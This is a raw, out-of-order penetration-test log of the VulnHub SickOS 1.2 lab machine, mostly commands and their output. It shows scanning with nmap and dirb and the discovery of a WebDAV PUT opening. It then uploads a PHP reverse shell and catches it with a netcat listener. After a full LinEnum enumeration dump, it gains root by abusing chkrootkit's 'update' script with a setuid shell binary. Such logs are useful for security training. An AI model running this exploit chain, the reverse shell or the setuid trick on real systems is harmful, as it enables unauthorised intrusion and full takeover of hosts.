lrwxrwxrwx 1 root root 21 Jul 19 2013 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Jul 19 2013 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Apr 5 2012 ufw -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2800 Jul 26 2012 umountfs
-rwxr-xr-x 1 root root 2211 Jul 26 2012 umountnfs.sh
-rwxr-xr-x 1 root root 2926 Jul 26 2012 umountroot
-rwxr-xr-x 1 root root 1985 Jul 26 2012 urandom
### SOFTWARE #############################################
Sudo version:
Sudo version 1.8.3p1
### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
Installed compilers:
ii gcc 4:4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler
Can we read/write sensitive files:
-rw-r--r-- 1 root root 953 Apr 12 2016 /etc/passwd
-rw-r--r-- 1 root root 620 Mar 30 2016 /etc/group
-rw-r--r-- 1 root root 665 Mar 30 2016 /etc/profile
-rw-r----- 1 root shadow 810 Apr 25 2016 /etc/shadow
Can't search *.conf files as no keyword was entered
Can't search *.log files as no keyword was entered
Can't search *.ini files as no keyword was entered
All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 604 Oct 19 2011 /etc/deluser.conf
-rw-r--r-- 1 root root 350 Mar 30 2016 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 552 Feb 8 2012 /etc/pam.conf
-rw-r--r-- 1 root root 144 Mar 30 2016 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 May 2 2011 /etc/ucf.conf
-rw-r--r-- 1 root root 3343 Sep 30 2013 /etc/gai.conf
-rw-r--r-- 1 root root 92 Apr 19 2012 /etc/host.conf
-rw-r--r-- 1 root root 321 Mar 29 2012 /etc/blkid.conf
-rw-r--r-- 1 root root 475 Apr 19 2012 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2083 Oct 16 2013 /etc/sysctl.conf
-rw-r--r-- 1 root root 1263 Sep 5 2013 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4728 May 2 2012 /etc/hdparm.conf
-rw-r----- 1 root fuse 216 Oct 18 2011 /etc/fuse.conf
-rw-r--r-- 1 root root 56 Apr 12 2016 /etc/chkrootkit.conf
-rw-r--r-- 1 root root 2981 Mar 30 2016 /etc/adduser.conf
-rw-r--r-- 1 root root 6961 Mar 30 2016 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 956 Mar 30 2012 /etc/mke2fs.conf
-rw-r--r-- 1 root root 333 Mar 30 2016 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Oct 4 2011 /etc/logrotate.conf
-rw-r--r-- 1 root root 2969 Mar 15 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 15752 Jul 25 2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 34 Mar 30 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 839 Apr 9 2012 /etc/insserv.conf
Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Mar 30 2016 .
drwxr-xr-x 12 root root 4096 Apr 26 2016 ..
### SCAN COMPLETE ####################################
www-data@ubuntu:/tmp$
dpkg -l | grep chkrootkit
rc chkrootkit 0.49-4ubuntu1.1 rootkit detector
echo 'int main(void)' > test.c
echo '{ ' >> test.c
echo 'setgid(0);' >> test.c
echo 'setuid(0);' >> test.c
echo 'execl("/bin/sh", "sh", 0);' >> test.c
echo '}' >> test.c
echo '#!/bin/bash' > update
echo 'chown root /tmp/test' >> update
echo 'chgrp root /tmp/test' >> update
echo 'chmod u+s /tmp/test' >> update
gcc test.c -o test
gcc test.c -o test
test.c: In function 'main':
test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
test.c:5:1: warning: missing sentinel in function call [-Wformat]
www-data@ubuntu:/tmp$ run-parts
drwxr-xr-x 22 root root 4096 Mar 30 2016 ..
-rwxr-xr-x 1 www-data www-data 40155 Jan 5 09:42 1.sh
-rw-r--r-- 1 www-data www-data 40155 Jan 5 09:43 2.py
-rw-r--r-- 1 www-data www-data 36801 Jan 5 09:43 3.sh
-rw-r--r-- 1 www-data www-data 5123 Jan 5 09:48 37292.c
drwxrwxrwt 2 root root 4096 Jan 5 09:41 VMwareDnD
srwxr-xr-x 1 www-data www-data 0 Jan 5 09:41 php.socket-0
-rwsrwxrwx 1 root root 7235 Jan 5 09:59 test
-rw-rw-rw- 1 www-data www-data 69 Jan 5 09:56 test.c
-rw-rw-rw- 1 www-data www-data 2 Jan 5 09:55 test.cls
-rwxrwxrwx 1 www-data www-data 74 Jan 5 09:57 update
-rw-rw-rw- 1 www-data www-data 20 Jan 5 09:56 updatels
-rw-r--r-- 1 root root 1600 Jan 5 09:41 vgauthsvclog.txt.0
drwx------ 2 root root 4096 Jan 5 09:41 vmware-root
www-data@ubuntu:/tmp$ ./test
./test
whoami
root
Regards,
Yuriy Stanchev/URIX
https://www.vulnhub.com/entry/sickos-12,144/
Home brewed tools used: https://github.com/iuristanchev/pentesting_tools
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.9 00:0c:29:98:f5:19 1 60 VMware, Inc.
Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:24 EET
Nmap scan report for 192.168.1.9
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
| http-useragent-tester:
|
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
| WWW-Mechanize/1.34
|_
MAC Address: 00:0C:29:98:F5:19 (VMware)
Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT STATE SERVICE
80/tcp open http
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.9
|
| Path: http://192.168.1.9:80/
| Line number: 96
| Comment:
| <!-- NOTHING IN HERE ///\\\ -->
|
| Path: http://192.168.1.9:80/
| Line number: 96
| Comment:
|_ ///\\\ -->>>>
MAC Address: 00:0C:29:98:F5:19 (VMware)
amap v5.4 (www.thc.org/thc-amap) started at 2017-01-04 20:34:33 - APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.9:80/tcp matches http - banner: HTTP/1.0 200 OK\r\nX-Powered-By PHP/5.3.10-1ubuntu3.21\r\nContent-type text/html\r\nContent-Length 163\r\nConnection close\r\nDate Wed, 04 Jan 2017 203433 GMT\r\nServer lighttpd/1.4.28\r\n\r\n<html>\n\n<img src="blow.jpg">\n\n</html>\n\n\n\n\n\n\n\n\n\n\n
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 4 20:57:05 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.1.9:80/ ----
==> DIRECTORY: http://192.168.1.9:80/test/
+ http://192.168.1.9:80/~sys~ (CODE:403|SIZE:345)
---- Entering directory: http://192.168.1.9:80/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
* Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Wed, 04 Jan 2017 21:01:06 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.9 left intact
nc -nlvp 443
curl --upload-file /root/Desktop/pentesting_tools/tools/php-reverse-shell.txt -v --url http://192.168.1.9/test/shell.php -0 --http1.0
* Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> PUT /test/shell.php HTTP/1.0
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5495
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 04 Jan 2017 21:43:01 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 46960
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
13:43:47 up 1:30, 0 users, load average: 0.02, 0.04, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$
python -c 'import pty; pty.spawn("/bin/sh")'
cat /etc/debian_version
wheezy/sid
uname -v
#25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#
Debug Info
thorough tests = disabled
Scan started at:
Thu Jan 5 09:43:36 PST 2017
### SYSTEM ##############################################
Kernel information:
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
Kernel information (continued):
Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
NAME="Ubuntu"
VERSION="12.04.4 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
VERSION_ID="12.04"
Hostname:
ubuntu
### USER/GROUP ##########################################
Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Users that have previously logged onto the system:
Username Port From Latest
root pts/0 192.168.0.100 Tue Apr 26 03:57:15 -0700 2016
john tty1 Wed Mar 30 05:09:38 -0700 2016
All users and uid/gid info:
root:x:0:0
daemon:x:1:1
bin:x:2:2
sys:x:3:3
sync:x:4:65534
games:x:5:60
man:x:6:12
lp:x:7:7
mail:x:8:8
news:x:9:9
uucp:x:10:10
proxy:x:13:13
www-data:x:33:33
backup:x:34:34
list:x:38:38
irc:x:39:39
gnats:x:41:41
nobody:x:65534:65534
libuuid:x:100:101
syslog:x:101:103
messagebus:x:102:104
john:x:1000:1000
sshd:x:103:65534
Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
Super user account(s):
root
Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Mar 30 2016 .
drwxr-xr-x 22 root root 4.0K Mar 30 2016 ..
drwxr-xr-x 3 john john 4.0K Apr 12 2016 john
Root is allowed to login via SSH:
PermitRootLogin yes
### ENVIRONMENTAL #######################################
Path information:
/sbin:/bin:/usr/sbin:/usr/bin
Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
Current umask value:
0000
u=rwx,g=rwx,o=rwx
umask value as specified in /etc/login.defs:
UMASK 022
Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
/etc/cron.daily:
total 72
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 15399 Nov 15 2013 apt
-rwxr-xr-x 1 root root 314 Apr 18 2013 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
-rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
-rwxr-xr-x 1 root root 338 Dec 20 2011 lighttpd
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Dec 28 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Sep 12 2012 passwd
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Mar 30 2016 .
drwxr-xr-x 84 root root 4096 Jan 5 09:41 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 730 Sep 13 2013 apt-xapian-index
-rwxr-xr-x 1 root root 907 Dec 28 2012 man-db
Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
### NETWORKING ##########################################
Network & IP info:
eth0 Link encap:Ethernet HWaddr 00:0c:29:98:f5:19
inet addr:192.168.1.9 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:268 errors:0 dropped:0 overruns:0 frame:0
TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:142432 (142.4 KB) TX bytes:22042 (22.0 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Nameserver(s):
nameserver 192.168.1.1
Default route:
default 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.9:56045 192.168.1.20:443 ESTABLISHED 984/php-cgi
tcp 0 0 192.168.1.9:80 192.168.1.20:48676 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:68 0.0.0.0:* -
### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.5 0.1 3396 1832 ? Ss 09:41 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 09:41 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 09:41 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:0]
root 5 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/0:0H]
root 6 0.1 0.0 0 0 ? S 09:41 0:00 [kworker/u16:0]
root 7 0.0 0.0 0 0 ? S 09:41 0:00 [migration/0]
root 8 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 09:41 0:00 [rcu_sched]
root 10 0.0 0.0 0 0 ? S 09:41 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S< 09:41 0:00 [khelper]
root 12 0.0 0.0 0 0 ? S 09:41 0:00 [kdevtmpfs]
root 13 0.0 0.0 0 0 ? S< 09:41 0:00 [netns]
root 14 0.0 0.0 0 0 ? S< 09:41 0:00 [writeback]
root 15 0.0 0.0 0 0 ? S< 09:41 0:00 [kintegrityd]
root 16 0.0 0.0 0 0 ? S< 09:41 0:00 [bioset]
root 17 0.0 0.0 0 0 ? S< 09:41 0:00 [kworker/u17:0]
root 18 0.0 0.0 0 0 ? S< 09:41 0:00 [kblockd]
root 19 0.0 0.0 0 0 ? S< 09:41 0:00 [ata_sff]
root 20 0.0 0.0 0 0 ? S 09:41 0:00 [khubd]
root 21 0.0 0.0 0 0 ? S< 09:41 0:00 [md]
root 22 0.0 0.0 0 0 ? S< 09:41 0:00 [devfreq_wq]
root 23 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:1]
root 25 0.0 0.0 0 0 ? S 09:41 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S 09:41 0:00 [kswapd0]
root 27 0.0 0.0 0 0 ? SN 09:41 0:00 [ksmd]
root 28 0.0 0.0 0 0 ? SN 09:41 0:00 [khugepaged]
root 29 0.0 0.0 0 0 ? S 09:41 0:00 [fsnotify_mark]
root 30 0.0 0.0 0 0 ? S 09:41 0:00 [ecryptfs-kthrea]
root 31 0.0 0.0 0 0 ? S< 09:41 0:00 [crypto]
root 43 0.0 0.0 0 0 ? S< 09:41 0:00 [kthrotld]
root 44 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:1]
root 45 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_0]
root 46 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_1]
root 47 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:2]
root 48 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:3]
root 49 0.0 0.0 0 0 ? S< 09:41 0:00 [dm_bufio_cache]
root 50 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:4]
root 69 0.0 0.0 0 0 ? S< 09:41 0:00 [deferwq]
root 70 0.0 0.0 0 0 ? S< 09:41 0:00 [charger_manager]
root 71 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/0:2]
root 193 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt_poll_0]
root 208 0.0 0.0 0 0 ? S< 09:41 0:00 [mpt/0]
root 220 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_2]
root 221 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_3]
root 227 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_4]
root 229 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_5]
root 231 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_6]
root 232 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_7]
root 233 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_8]
root 234 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_9]
root 237 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_10]
root 238 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_11]
root 239 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_12]
root 240 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_13]
root 241 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_14]
root 242 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_15]
root 243 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_16]
root 244 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_17]
root 245 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_18]
root 246 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_19]
root 247 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_20]
root 248 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_21]
root 249 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_22]
root 250 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_23]
root 251 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_24]
root 252 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_25]
root 253 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_26]
root 254 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_27]
root 255 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_28]
root 256 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_29]
root 257 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_30]
root 258 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_31]
root 259 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:5]
root 260 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:6]
root 261 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:7]
root 262 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:8]
root 263 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:9]
root 264 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:10]
root 265 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:11]
root 266 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:12]
root 267 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:13]
root 268 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:14]
root 269 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:15]
root 270 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:16]
root 271 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:17]
root 272 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:18]
root 273 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:19]
root 274 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:20]
root 275 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:21]
root 276 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:22]
root 277 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:23]
root 278 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:24]
root 279 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:25]
root 280 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:26]
root 281 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:27]
root 282 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:28]
root 283 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:29]
root 284 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:30]
root 285 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:31]
root 286 0.0 0.0 0 0 ? S 09:41 0:00 [scsi_eh_32]
root 287 0.0 0.0 0 0 ? S 09:41 0:00 [kworker/u16:32]
root 379 0.0 0.0 0 0 ? S 09:41 0:00 [jbd2/sda1-8]
root 380 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-rsv-conver]
root 381 0.0 0.0 0 0 ? S< 09:41 0:00 [ext4-unrsv-conv]
root 469 0.0 0.0 2832 608 ? S 09:41 0:00 upstart-udev-bridge --daemon
root 471 0.0 0.1 3080 1296 ? Ss 09:41 0:00 /sbin/udevd --daemon
102 547 0.0 0.0 3256 652 ? Ss 09:41 0:00 dbus-daemon --system --fork --activation=upstart
syslog 557 0.1 0.1 30036 1472 ? Sl 09:41 0:00 rsyslogd -c5
root 622 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 623 0.0 0.0 3020 812 ? S 09:41 0:00 /sbin/udevd --daemon
root 642 0.0 0.0 0 0 ? S< 09:41 0:00 [ttm_swap]
root 706 0.0 0.0 0 0 ? S< 09:41 0:00 [kpsmoused]
root 752 0.0 0.0 2844 348 ? S 09:41 0:00 upstart-socket-bridge --daemon
root 797 0.0 0.0 2924 404 ? Ss 09:41 0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root 819 0.0 0.2 6680 2400 ? Ss 09:41 0:00 /usr/sbin/sshd -D
root 899 0.0 0.0 4628 840 tty4 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty4
root 903 0.0 0.0 4628 836 tty5 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty5
root 907 0.0 0.0 4628 844 tty2 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty2
root 908 0.0 0.0 4628 832 tty3 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty3
root 912 0.0 0.0 4628 836 tty6 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty6
root 920 0.0 0.0 2616 884 ? Ss 09:41 0:00 cron
daemon 921 0.0 0.0 2468 348 ? Ss 09:41 0:00 atd
www-data 966 0.0 0.2 8272 2236 ? S 09:41 0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
www-data 968 0.0 0.4 17844 4720 ? Ss 09:41 0:00 /usr/bin/php-cgi
www-data 982 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 983 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 984 0.0 0.2 18100 3072 ? S 09:41 0:00 /usr/bin/php-cgi
www-data 985 0.0 0.1 17844 1752 ? S 09:41 0:00 /usr/bin/php-cgi
root 1003 0.0 0.0 4628 836 tty1 Ss+ 09:41 0:00 /sbin/getty -8 38400 tty1
root 1187 0.0 0.0 22584 564 ? Ssl 09:41 0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
root 1206 0.1 0.5 11268 5660 ? S 09:41 0:00 /usr/sbin/vmtoolsd
root 1230 0.0 0.7 14736 7840 ? S 09:41 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
www-data 1243 0.0 0.0 2232 544 ? S 09:41 0:00 sh -c uname -a; w; id; /bin/bash -i
www-data 1247 0.0 0.1 3448 1708 ? S 09:41 0:00 /bin/bash -i
www-data 3185 0.2 0.1 3412 1428 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3467 0.0 0.0 3384 644 ? S 09:43 0:00 /bin/bash ./1.sh
www-data 3468 0.0 0.1 2860 1032 ? R 09:43 0:00 ps aux
Process binaries & associated permissions (from above list):
-rwxr-xr-x 1 root root 920788 Mar 28 2013 /bin/bash
-rwxr-xr-x 2 root root 26696 Mar 29 2012 /sbin/getty
-rwxr-xr-x 1 root root 194528 Jan 18 2013 /sbin/init
-rwxr-xr-x 1 root root 177552 Jul 19 2013 /sbin/udevd
lrwxrwxrwx 1 root root 25 Apr 12 2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
